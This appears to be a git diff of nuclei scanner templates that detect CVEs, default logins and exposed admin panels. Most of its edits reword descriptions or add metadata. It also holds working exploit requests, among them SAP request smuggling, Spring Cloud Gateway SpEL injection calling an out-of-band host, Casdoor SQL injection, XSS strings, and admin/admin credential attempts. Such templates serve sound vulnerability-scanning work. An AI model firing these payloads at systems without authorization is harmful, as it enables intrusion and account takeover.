+  description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.
  reference:
    - https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
    - https://wordpress.org/plugins/wp-html-mail/
@ -38,3 +38,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0281.yaml
+++ b/cves/2022/CVE-2022-0281.yaml
@ -4,7 +4,7 @@ info:
  name: Microweber Information Disclosure
  author: pikpikcu
  severity: high
-  description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.
+  description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0281
  tags: cve,cve2022,microweber,disclosure
@ -34,3 +34,5 @@ requests:
          - '"email":'
          - '"display_name":'
        condition: and
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0378.yaml
+++ b/cves/2022/CVE-2022-0378.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-0378
 info:
-  name: Microweber XSS
+  name: Microweber Reflected Cross-Site Scripting
  author: pikpikcu
  severity: medium
-  description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
+  description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0378
  tags: cve,cve2022,microweber,xss
@ -33,3 +33,5 @@ requests:
          - 'mwui_init'
          - 'onmousemove="alert(document.domain)'
        condition: and
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0432.yaml
+++ b/cves/2022/CVE-2022-0432.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-0432
 info:
-  name: CVE-2022-0432
+  name: Mastodon Prototype Pollution Vulnerability
  author: pikpikcu
  severity: medium
-  description: Prototype Pollution in GitHub repository mastodon/mastodon prior to 3.5.0.
+  description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.
  reference:
    - https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09
    - https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view
@ -31,3 +31,5 @@ requests:
        part: body
        words:
          - "if (data.type !== 'setHeight' || !iframes[data.id]) {"
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-0653.yaml
+++ b/cves/2022/CVE-2022-0653.yaml
@ -1,13 +1,17 @@
 id: CVE-2022-0653
 info:
-  name: Wordpress Profile Builder Plugin XSS
+  name: Wordpress Profile Builder Plugin Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
    - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
  tags: cve,cve2022,wordpress,xss,wp-plugin
-  description: "The Profile Builder &#8211; User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n"
+  description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
  remediation: Upgrade to version 3.6.5 or later.
  classification:
    cve-id: CVE-2022-0653
 requests:
  - method: GET
@ -29,3 +33,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@ -0,0 +1,59 @@
 id: CVE-2022-22536
 info:
  name: SAP Memory Pipes(MPI) Desynchronization
  author: pdteam
  severity: critical
  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22536
    - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
    - https://github.com/Onapsis/onapsis_icmad_scanner
    - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
  tags: cve,cve2022,sap,smuggling
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.00
    cve-id: CVE-2022-22536
    cwe-id: CWE-444
 requests:
  - raw:
      - |+
        GET {{sap_path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 82646
        Connection: keep-alive
        {{repeat("A", 82642)}}
        GET / HTTP/1.1
        Host: {{Hostname}}
    payloads:
      sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner
        - /sap/admin/public/default.html
        - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
    unsafe: true
    read-all: true
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: dsl
        dsl:
          - "contains(tolower(body), 'administration')" # confirms 1st path
          - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path
        condition: or
      - type: word
        part: body
        words:
          - "400 Bad Request" # error in concatenated response
          - "500 Internal Server Error"
          - "500 Dispatching Error"
        condition: or
--- a/cves/2022/CVE-2022-22947.yaml
+++ b/cves/2022/CVE-2022-22947.yaml
@ -0,0 +1,77 @@
 id: CVE-2022-22947
 info:
  name: Spring Cloud Gateway Code Injection
  author: pdteam
  severity: critical
  description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
  reference:
    - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
    - https://github.com/wdahlenburg/spring-gateway-demo
    - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
    - https://tanzu.vmware.com/security/cve-2022-22947
  tags: cve,cve2022,apache,spring,vmware,actuator,oast
 requests:
  - raw:
      - |
        POST /actuator/gateway/routes/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {
          "predicates": [
            {
              "name": "Path",
              "args": {
                "_genkey_0": "/{{randstr}}/**"
              }
            }
          ],
          "filters": [
            {
              "name": "RewritePath",
              "args": {
                "_genkey_0": "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}",
                "_genkey_1": "/${path}"
              }
            }
          ],
          "uri": "{{RootURL}}",
          "order": 0
        }
      - |
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {
          "predicate": "Paths: [/{{randstr}}], match trailing slash: true",
          "route_id": "{{randstr}}",
          "filters": [
            "[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]"
          ],
          "uri": "{{RootURL}}",
          "order": 0
        }
      - |
        DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 201
      - type: word
        part: header
        words:
          - "/routes/{{randstr}}"
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@ -4,8 +4,9 @@ info:
  name: Zabbix - SAML SSO Authentication Bypass
  author: For3stCo1d
  severity: critical
-  description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
+  description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
  reference:
    - https://support.zabbix.com/browse/ZBX-20350
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
    - https://github.com/1mxml/CVE-2022-23131
@ -37,3 +38,5 @@ requests:
      - type: dsl
        dsl:
          - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-23178.yaml
+++ b/cves/2022/CVE-2022-23178.yaml
@ -33,3 +33,5 @@ requests:
          - '"uname":'
          - '"upassword":'
        condition: and
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-23808.yaml
+++ b/cves/2022/CVE-2022-23808.yaml
@ -1,26 +1,28 @@
 id: CVE-2022-23808
 info:
-  name: phpMyAdmin < 5.1.2 - XSS
+  name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
  author: cckuailong
  severity: medium
-  description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.
+  description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
  reference:
    - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
    - https://github.com/dipakpanchal456/CVE-2022-23808
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23808
  tags: cve,cve2022,phpmyadmin,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23808
    cwe-id: CWE-79
  tags: cve,cve2022,phpmyadmin,xss
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
      - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
@ -36,3 +38,5 @@ requests:
        part: body
        words:
          - "\">'><script>alert(document.domain)</script>"
 # Enhanced by mp on 2022/02/28
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@ -0,0 +1,38 @@
 id: CVE-2022-24124
 info:
  name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
  author: cckuailong
  severity: high
  description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
  reference:
    - https://www.exploit-db.com/exploits/50792
    - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
  metadata:
    product: https://casdoor.org/
    shodan-query: http.title:"Casdoor"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24124
    cwe-id: CWE-89
  tags: cve,cve2022,casdoor,sqli,unauth
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error.*&#39"
          - "casdoor"
        condition: and
      - type: status
        status:
          - 200
--- a/cves/2022/CVE-2022-25369.yaml
+++ b/cves/2022/CVE-2022-25369.yaml
@ -1,13 +1,22 @@
 id: CVE-2022-25369
 info:
-  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
+  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
  author: pdteam
  severity: critical
-  reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
+  description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
  remediation: "Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0."
  reference:
    - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
  metadata:
    shodan-query: http.component:"Dynamicweb"
  tags: cve,cve2022,dynamicweb,rce,unauth
  classification:
    cve-id: CVE-2022-25369
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-425
 requests:
  - method: GET
@ -33,4 +42,6 @@ requests:
      - type: status
        status:
-          - 200
+          - 200
 # Enhanced by cs on 2022/02/28
--- a/default-logins/apache/superset-default-login.yaml
+++ b/default-logins/apache/superset-default-login.yaml
@ -1,11 +1,17 @@
-id: apache-superset-default-login
+id: CVE-2021-44451
 info:
  name: Apache Superset Default Login
  author: dhiyaneshDK
  severity: high
-  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+  description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
  remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
  tags: apache, default-login
  classification:
    cve-id: CVE-2021-44451
 requests:
  - raw:
@ -57,3 +63,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/02
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@ -63,4 +63,4 @@ requests:
      - type: word
        words:
-          - Apache Tomcat
+          - Apache Tomcat
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@ -1,47 +1,55 @@
-id: azkaban-default-login
+id: azkaban-default-login
-
+
-info:
+info:
-  name: Azkaban Web Client Default Credential
+  name: Azkaban Web Client Default Credential
-  author: pussycat0x
+  author: pussycat0x
-  severity: high
+  severity: high
-  reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+  description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs.  Default web client credentials were discovered.
-  tags: default-login,azkaban
+  reference:
-
+    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
-requests:
+  tags: default-login,azkaban
-  - raw:
+  classification:
-      - |
+    cwe-id: 255
-        POST / HTTP/1.1
+
-        Host: {{Hostname}}
+requests:
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+  - raw:
-
+      - |
-        action=login&username={{username}}&password={{password}}
+        POST / HTTP/1.1
-
+        Host: {{Hostname}}
-    payloads:
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-      username:
+
-        - admin
+        action=login&username={{username}}&password={{password}}
-      password:
+
-        - admin
+    payloads:
-    attack: pitchfork
+      username:
-    matchers-condition: and
+        - admin
-    matchers:
+      password:
-      - type: word
+        - admin
-        words:
+    attack: pitchfork
-          - '"session.id"'
+    matchers-condition: and
-          - '"success"'
+    matchers:
-        condition: and
+      - type: word
-
+        words:
-      - type: word
+          - '"session.id"'
-        words:
+          - '"success"'
-          - 'azkaban.browser.session.id'
+        condition: and
-          - 'application/json'
+
-        condition: and
+      - type: word
-        part: header
+        words:
-
+          - 'azkaban.browser.session.id'
-      - type: status
+          - 'application/json'
-        status:
+        condition: and
-          - 200
+        part: header
-
+
-    extractors:
+      - type: status
-      - type: kval
+        status:
-        kval:
+          - 200
-          - azkaban.browser.session.id
+
    extractors:
      - type: kval
        kval:
          - azkaban.browser.session.id
 # Enhanced by mp on 2022/03/02
 # Enhanced by mp on 2022/03/02
--- a/default-logins/chinaunicom/chinaunicom-default-login.yaml
+++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml
@ -1,10 +1,13 @@
 id: chinaunicom-default-login
 info:
-  name: Chinaunicom Modem Default Login
+  name: China Unicom Modem Default Login
  author: princechaddha
  severity: high
  description: Default login credentials were discovered for a China Unicom modem.
  tags: chinaunicom,default-login
  classification:
    cwe-id: 798
 requests:
  - raw:
@ -31,3 +34,5 @@ requests:
        words:
          - "/menu.gch"
        part: header
 # Enhanced by mp on 2022/03/02
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@ -3,11 +3,15 @@ id: cobbler-default-login
 info:
  name: Cobbler Default Login
  author: c-sh0
  description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
  reference:
    - https://seclists.org/oss-sec/2022/q1/146
    - https://github.com/cobbler/cobbler/issues/2307
    - https://github.com/cobbler/cobbler/issues/2909
  severity: high
  tags: cobbler,default-login,api
  classification:
    cwe-id: cwe-798
 requests:
  - raw:
@ -64,3 +68,5 @@ requests:
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"
 # Enhanced by mp on 2022/03/02
--- a/default-logins/dell/dell-idrac-default-login.yaml
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@ -1,9 +1,15 @@
 id: dell-idrac-default-login
 info:
-  name: Dell iDRAC6/7/8 Default login
+  name: Dell iDRAC6/7/8 Default Login
  author: kophjager007
  severity: high
  description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
  reference:
    - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
  tags: dell,idrac,default-login
  classification:
    cwe-id: 798
 requests:
  - raw:
@ -34,3 +40,5 @@ requests:
      - type: word
        words:
          - '<authResult>0</authResult>'
 # Enhanced by mp on 2022/03/02
--- a/default-logins/dell/dell-idrac9-default-login.yaml
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@ -4,7 +4,12 @@ info:
  name: DELL iDRAC9 Default Login
  author: kophjager007,milo2012
  severity: high
  description: DELL iDRAC9 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
  reference:
    - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
  tags: dell,idrac,default-login
  classification:
    cwe-id: 798
 requests:
  - raw:
@ -33,3 +38,5 @@ requests:
        part: body
        words:
          - '"authResult":0'
 # Enhanced by mp on 2022/03/02
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@ -11,9 +11,6 @@ info:
  metadata:
    shodan-query: http.title:"GitLab"
 # Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
 # So make sure, not to attempt more than 4 password for same valid user.
 requests:
  - raw:
      - |
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@ -35,14 +35,14 @@ requests:
    matchers:
      - type: word
        words:
-          - "grafana_session" # Login cookie
+          - "grafana_session"  # Login cookie
        part: header
      - type: word
        part: body
        words:
-          - "Logged in" # Logged in keyword
+          - "Logged in"  # Logged in keyword
      - type: status
        status:
-          - 200
+          - 200
--- a/default-logins/szhe/szhe-default-login.yaml
+++ b/default-logins/szhe/szhe-default-login.yaml
@ -6,7 +6,7 @@ info:
  severity: low
  tags: szhe,default-login
  reference:
-    - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
+    - https://github.com/Cl0udG0d/SZhe_Scan  # vendor homepage
 requests:
  - raw:
--- a/exposed-panels/barracuda-panel.yaml
+++ b/exposed-panels/barracuda-panel.yaml
@ -5,6 +5,11 @@ info:
  author: dhiyaneshDK
  severity: info
  tags: barracuda,panel,vpn
  description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    cvss-score: 0.0
    cwe-id: CWE-200
 requests:
  - method: GET
@ -20,3 +25,5 @@ requests:
      - type: word
        words:
          - 'Barracuda SSL VPN'
 # Enhanced by mp on 2022/03/01
--- a/exposed-panels/bitrix-panel.yaml
+++ b/exposed-panels/bitrix-panel.yaml
@ -5,6 +5,11 @@ info:
  author: juicypotato1
  severity: info
  tags: panel,bitrix,login
  description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
    cvss-score: 0.0
    cwe-id: CWE-200
 requests:
  - method: GET
@ -25,3 +30,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/01
--- a/exposed-panels/casdoor-login.yaml
+++ b/exposed-panels/casdoor-login.yaml
@ -0,0 +1,26 @@
 id: casdoor-login
 info:
  name: Casdoor Login Panel
  author: princechaddha
  severity: info
  metadata:
    shodan-query: http.title:"Casdoor"
  tags: panel,casdoor
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/login"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Casdoor</title>"
      - type: status
        status:
          - 200
--- a/exposed-panels/digitalrebar-login.yaml
+++ b/exposed-panels/digitalrebar-login.yaml
@ -0,0 +1,31 @@
 id: digitalrebar-login
 info:
  name: RackN Digital Rebar Login Panel
  author: c-sh0
  severity: info
  description: RackN Digital Rebar provision UI detection
  reference:
    - https://docs.rackn.io/
    - https://docs.rackn.io/en/latest/doc/server.html#ports
  tags: rackn,digitalrebar,panel
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/ui"
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - 'Digital Rebar'
--- a/exposed-panels/directum-login.yaml
+++ b/exposed-panels/directum-login.yaml
@ -0,0 +1,27 @@
 id: directum-login
 info:
  name: Directum Login Panel
  author: pikpikcu
  severity: info
  metadata:
    fofa-query: title="Directum"
  tags: directum,panel
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/Login.aspx"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DIRECTUM Login"
          - "Directum Login"
        condition: or
      - type: status
        status:
          - 200
--- a/exposed-panels/gitlab-detect.yaml
+++ b/exposed-panels/gitlab-detect.yaml
@ -4,6 +4,8 @@ info:
  name: Detect Gitlab
  author: ehsahil
  severity: info
  metadata:
    shodan-query: http.title:"GitLab"
  tags: panel,gitlab
 requests:
--- a/exposed-panels/issabel-login.yaml
+++ b/exposed-panels/issabel-login.yaml
@ -0,0 +1,27 @@
 id: issabel-login
 info:
  name: Issabel Login Panel
  author: pikpikcu
  severity: info
  metadata:
    fofa-query: title="Issabel"
  tags: issabel,panel
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="http://www.issabel.org"'
          - '<title>Issabel - Login page</title>'
        condition: or
      - type: status
        status:
          - 200
--- a/exposed-panels/librenms-login.yaml
+++ b/exposed-panels/librenms-login.yaml
@ -0,0 +1,25 @@
 id: librenms-login
 info:
  name: LibreNMS Login Panel
  author: pikpikcu
  severity: info
  metadata:
    fofa-query: title="librenms"
  tags: librenms,panel
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/login"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>LibreNMS</title>'
      - type: status
        status:
          - 200
--- a/exposed-panels/ocs-inventory-login.yaml
+++ b/exposed-panels/ocs-inventory-login.yaml
@ -0,0 +1,27 @@
 id: ocs-inventory-login
 info:
  name: OCS Inventory Login Panel
  author: pikpikcu
  severity: info
  metadata:
    fofa-query: title="OCS Inventory"
  tags: ocs-inventory,panel
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>OCS Inventory</title>'
      - type: status
        status:
          - 200
--- a/exposed-panels/sitefinity-login.yaml
+++ b/exposed-panels/sitefinity-login.yaml
@ -3,6 +3,7 @@ id: sitefinity-login
 info:
  name: Sitefinity Login
  author: dhiyaneshDK
  description: This template identifies the Sitefinity login page.
  severity: info
  reference: https://www.exploit-db.com/ghdb/6722
  tags: panel,sitefinity
@ -20,3 +21,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by cs on 2022/02/28
--- a/exposed-panels/subrion-login.yaml
+++ b/exposed-panels/subrion-login.yaml
@ -0,0 +1,32 @@
 id: subrion-login
 info:
  name: Subrion Admin Login Panel
  author: princechaddha
  severity: info
  tags: panel,subrion
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/panel"
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h1>Welcome to<br>Subrion Admin Panel</h1>"
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "Subrion CMS ([a-z0-9.]+)</a><br>"
--- a/exposures/backups/sql-dump.yaml
+++ b/exposures/backups/sql-dump.yaml
@ -31,7 +31,7 @@ requests:
    headers:
      Range: "bytes=0-3000"
-    max-size: 2000 # Size in bytes - Max Size to read from server response
+    max-size: 2000  # Size in bytes - Max Size to read from server response
    matchers-condition: and
    matchers:
      - type: regex
--- a/exposures/backups/zip-backup-files.yaml
+++ b/exposures/backups/zip-backup-files.yaml
@ -40,7 +40,7 @@ requests:
        - "sql.z"
        - "sql.tar.z"
-    max-size: 500 # Size in bytes - Max Size to read from server response
+    max-size: 500  # Size in bytes - Max Size to read from server response
    matchers-condition: and
    matchers:
      - type: binary
@ -66,4 +66,4 @@ requests:
      - type: status
        status:
-          - 200
+          - 200
--- a/exposures/configs/golang-metrics.yaml
+++ b/exposures/configs/golang-metrics.yaml
@ -1,24 +0,0 @@
 id: exposed-metrics
 info:
  name: Exposed metrics
  author: dhiyaneshDK
  severity: low
  reference: https://hackerone.com/reports/1026196
  tags: config,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/metrics"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'cpu_seconds_total'
        condition: and
      - type: status
        status:
          - 200
--- a/Show More
+++ b/Show More